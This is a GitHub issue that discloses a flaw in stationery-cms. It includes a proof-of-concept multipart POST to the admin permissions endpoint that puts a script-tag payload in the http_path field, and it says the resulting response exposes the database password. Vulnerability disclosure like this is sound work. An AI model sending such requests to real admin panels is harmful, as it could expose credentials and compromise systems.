Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Background authority management sql information leakage leakage database password #11

Open
qbz95aaa opened this issue Jan 8, 2023 · 0 comments
Open

Background authority management sql information leakage leakage database password #11

qbz95aaa opened this issue Jan 8, 2023 · 0 comments

Comments

@qbz95aaa
Copy link

qbz95aaa commented Jan 8, 2023
edited
Loading

Vulnerability affects product:[stationery-cms]
Vulnerability type:information leakage
Vulnerability Details:
Background authority management sql information leakage leakage database password

poc

POST /admin/auth/permissions HTTP/1.1
Host: 192.168.3.129:8091
Content-Length: 850
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarydDQj3dFW3TBgHzKD
Origin: http://192.168.3.129:8091
Referer: http://192.168.3.129:8091/admin/auth/permissions/create
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:laravel_session=eyJpdiI6IktBWWZZQkJZZlVsTkhyejZha3VpTUE9PSIsInZhbHVlIjoiYUVTR1RjR1VUVzR5bUIzS1ZRdHRnOENoU1lXcXJzODNHV0cxSVwvMkQ4ZHR5TUc1TXV3OEJKVGJ3OWhoaTNaRHQiLCJtYWMiOiIyZmFkOTkxNzExMzczNGRjNzVjYmE5ODc0NWIzMjAwMjkwMzhjZDQ1YTdiMzA1YjUzYjI3N2M3NTdmOTdmY2IxIn0%3D
Connection: close

------WebKitFormBoundarydDQj3dFW3TBgHzKD
Content-Disposition: form-data; name="slug"

testxss
------WebKitFormBoundarydDQj3dFW3TBgHzKD
Content-Disposition: form-data; name="name"

testxss
------WebKitFormBoundarydDQj3dFW3TBgHzKD
Content-Disposition: form-data; name="http_method[]"

GET
------WebKitFormBoundarydDQj3dFW3TBgHzKD
Content-Disposition: form-data; name="http_method[]"


------WebKitFormBoundarydDQj3dFW3TBgHzKD
Content-Disposition: form-data; name="http_path"

testxss<script>alert(1)</script>`
------WebKitFormBoundarydDQj3dFW3TBgHzKD
Content-Disposition: form-data; name="_token"

ED1xpWqdNpwzitdl1h6dkpsshUMpYwt7fxtNdVVY
------WebKitFormBoundarydDQj3dFW3TBgHzKD
Content-Disposition: form-data; name="_previous_"

http://192.168.3.129:8091/admin/auth/permissions
------WebKitFormBoundarydDQj3dFW3TBgHzKD--

image
then you can find db password and info
image

image
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@qbz95aaa